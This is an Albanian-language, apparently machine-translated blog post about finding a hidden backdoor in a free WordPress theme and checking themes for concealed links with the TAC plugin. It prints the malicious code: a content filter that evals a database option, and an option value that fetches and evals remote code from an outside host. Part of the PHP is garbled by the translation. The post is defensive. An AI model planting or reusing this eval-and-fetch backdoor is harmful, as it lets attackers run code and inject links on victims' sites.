Kjo është letra që mora javën e kaluar me email nga kompania ime pritëse. Kohët e fundit, ata kanë prezantuar një kontroll të rregullt të të gjithë skedarëve të faqes për të kërkuar përmbajtje me qëllim të keq, dhe ata e gjetën këtë përmbajtje tek unë!

Gjithçka filloi kur shkova në faqen time të internetit një pasdite dhe nuk mund ta hapja atë - një mesazh abuziv u shfaq në lidhje me skedarët me zgjerimin php që nuk u gjet. Pasi u tensionova pak, shkova të studioja përmbajtjen e dosjes me sitin në host dhe menjëherë zbulova një problem - skedari im i shabllonit fuctions.php u riemërua në functions.php.malware, i cili dukej se lë të kuptohet në mënyrë të paqartë - një antivirus ishte duke punuar këtu ose diçka e tillë) Pasi shkova në postë, gjeta raportin e mësipërm nga hosti.

Gjëja e parë që bëra, natyrisht, ishte fillimi i kontrollit të këtij skedari, studimi i përmbajtjes së tij, skanimi i tij me të gjitha llojet e antiviruseve, dhjetëra shërbime të kontrollit të viruseve në internet, etj. - në fund, asgjë nuk u gjet, të gjithë njëzëri pohuan se dosja ishte plotësisht e sigurt. Natyrisht, unë i shpreha dyshimet e mia mikpritësit, duke i thënë se kishe ngatërruar diçka, por për çdo rast, i kërkova të jepnin një raport për zbulimin e një kodi keqdashës.

Dhe kështu më janë përgjigjur

Shkova në google informacion rreth këtij kodi dhe mendova seriozisht...

Si të gjeni një pjesë të kodit me qëllim të keq në një shabllon

Siç rezulton, kjo është një teknikë vërtet jo e parëndësishme që lejon palët e interesuara të transmetojnë të dhëna në faqen tuaj dhe të ndryshojnë përmbajtjen e faqeve pa dijeninë tuaj! Nëse jeni duke përdorur një shabllon falas, atëherë Unë rekomandoj shumë të kontrolloni funksionet tuaja.php për kodin e mëposhtëm:

add_filter('the_content', '_bloginfo', 10001);
funksioni _bloginfo($content)(
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
kthej $co;
) ndryshe ktheje $content;
}

Edhe me njohuritë e mia shumë të cekëta të PHP-së, është e qartë se po krijohet një filtër i caktuar, i lidhur me variablin global postimin dhe përmbajtjen, të cilat janë përgjegjëse për shfaqjen e përmbajtjes vetëm në faqet e postimeve në blog (kushti is_single). Tashmë e dyshimtë, apo jo? Epo, tani le të shohim se çfarë do të shfaqë ky kod në faqen tonë të internetit.

Opsioni interesant blogoption i kërkuar në bazën e të dhënave gjithashtu duket shumë i dyshimtë. Ne hyjmë në bazën tonë të të dhënave MySQL dhe gjejmë një tabelë atje të quajtur wp_options, nëse nuk i keni ndryshuar prefikset atëherë do të duket kështu si parazgjedhje. Dhe në të gjejmë linjën që na intereson të quajtur blogoption

Çfarë bukurie! Ne shohim opsionin e mëposhtëm


ktheje eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Ato. Nga një sajt i caktuar (dhe një rus, ki parasysh) ata po kthejnë përmbajtje që mund të përmbajë çdo gjë! Çdo numër lidhjesh, kode me qëllim të keq, tekst të ndryshuar, etj. Kur hyni në vetë sajtin, ju jep një gabim aksesi 403, gjë që nuk është për t'u habitur. Sigurisht, e hoqa edhe këtë opsion nga baza e të dhënave.

Sipas informacioneve nga viktimat, përmbajtja e saktë e artikullit tuaj zakonisht kthehet me vetëm një modifikim - në vend të ndonjë pike "." një lidhje e hapur ishte fshehur në tekst! Dhe nga rruga, ky opsion shkruhet në bazën e të dhënave kur vetë shablloni është instaluar, dhe më pas kodi që e bën këtë vetë-shkatërrohet me sukses. Dhe jetova me të tilla mbeturina për dy vjet, dhe asnjë antivirus apo shërbim i vetëm nuk e identifikoi këtë kërcënim për mua gjatë gjithë asaj kohe. Për të qenë i sinqertë, nuk e vura re nëse ky mashtrim funksionoi ndonjëherë për mua, ose nëse shtojca ime e sigurisë e bllokoi këtë veçori (ose ndoshta një nga përditësimet e WordPress e mbylli këtë vrimë), por është ende e pakëndshme.

Morali për djathin falas

Si ju pëlqen sofistikimi i "përkthyesve" tanë të shablloneve (ose atyre që i postojnë në katalogët e tyre)? Kjo nuk është për ju që të hiqni lidhjet nga fundi) Më vjen keq që nuk mbaj mend nga e shkarkova shabllonin tim, ishte shumë kohë më parë, përndryshe do të kisha shkruar patjetër disa të dashur. Dhe nëse në atë kohë do të kisha të njëjtën përvojë që kam tani, definitivisht nuk do të kisha përdorur një shabllon falas, ose, në raste ekstreme, nuk do ta kisha shkarkuar atë nga burime të panjohura!

Është më e lehtë të blesh një model premium zyrtar për 15-20 dollarë dhe të jetosh në paqe, duke ditur që nuk ka vrima ose lidhje të koduara në të, dhe edhe nëse ka dobësi, zhvilluesit patjetër do të lëshojnë një përditësim në të cilin këto vrima do të jenë mbyllur. ( Nga rruga, Artem kohët e fundit botoi një artikull ku ai flet për shabllonet premium dhe madje jep kode promovuese për zbritje brutale për ata që janë të interesuar)

Një numër i madh temash dhe shabllonesh falas janë krijuar për motorin WordPress. Gjithçka që duhet të bëjmë është të gjejmë shabllonin e duhur, ta shkarkojmë dhe ta instalojmë në blogun tuaj. Në fakt, kjo është ajo që bëjnë shumë webmaster rishtar. Në të njëjtën kohë, ata nuk mendojnë fare për faktin se këto shabllone mund të jenë të pasigurta për uebsajtin e tyre të ardhshëm. Modelet krijohen shpesh nga përdoruesit e zakonshëm të motorit WordPress.

Disa krijues vendosin një mori lidhjesh të jashtme në shabllonet e tyre, të cilat mund të çojnë në sajte shumë të dyshimta. Për shembull, shablloni përmban një numër të madh lidhjesh me burime të orientuara seksualisht. Këto lidhje nuk do të jenë të dukshme nga jashtë. Megjithatë, roboti i kërkimit do t'i indeksojë ato dhe do t'u japë këtyre sajteve një pjesë të indeksit tuaj të citimeve. Përveç kësaj, sanksione të ndryshme mund të zbatohen për burimin tuaj (nëse ka shumë lidhje me faqet e dyshimta). Shtrohet pyetja - çfarë të bëjmë me shabllone të tillë falas? Nga rruga, modelet e paguara gjithashtu shpesh vuajnë nga prania e lidhjeve të fshehura.

Si të kontrolloni një shabllon për lidhje të jashtme?

Një shtesë e quajtur TAC (akronimi qëndron për Kontrolluesin e Autentitetit të Temave) do t'ju ndihmojë të kontrolloni shabllonin tuaj për praninë e lidhjeve të jashtme të fshehura në të. Mund ta shkarkoni nga lidhjen e mëposhtme në faqen zyrtare të WordPress. Kjo shtojcë është plotësisht falas dhe e lehtë për t'u instaluar dhe përdorur.

Pas aktivizimit të TAC, duhet të shkoni te parametrat e tij, të vendosur përgjatë shtegut të mëposhtëm - "Pamja" - "TAC". Aty mund të shihni rezultatet e skanimit të të gjitha temave që janë instaluar në blogun tuaj. Nëse gjithçka është në rregull me temën, atëherë pranë emrit të tij do të ketë një drejtkëndësh të gjelbër me mbishkrimin "Tema OK!".

Duhet mbajtur mend se ky mbishkrim nënkupton mungesën e ndonjë lidhjeje të koduar. Të gjitha lidhjet e tjera të jashtme do të renditen më poshtë. Ju lutemi studioni me kujdes këto lidhje dhe kontrolloni se ku të çojnë. Si rregull, çdo shabllon përmban një lidhje me faqen e internetit të krijuesit të saj. Zakonisht kjo lidhje është e dukshme për vizitorët e blogut dhe ndodhet në fund.

Është zakon midis webmasterëve të mos fshihen lidhje të tilla, sepse ky është një lloj nderimi për autorin e shabllonit, i cili e bëri atë falas për ju. Nëse shablloni përmban lidhje me disa sajte të tjera, është më mirë t'i hiqni ato. Kjo mund të bëhet duke hapur skedarin e kërkuar të shabllonit.

Unë do të përfundoj këtu. Paç fat! dhe deri në artikujt e ardhshëm.
Me shumë respekt,

Ju pëlqeu artikulli? Abonohuni në lajmet e blogut ose shpërndani në rrjetet sociale dhe unë do t'ju përgjigjem


3 komente në postimin "shtojca TAC ose si të kontrolloni një shabllon për lidhje të jashtme"

    Unë skanova shabllonin për ta dhe ai tregoi - ok. Edhe pse diçka shton një lidhje wp-load.php. Çfarë tjetër rekomandoni?

ARTIKUJ TË LIDHUR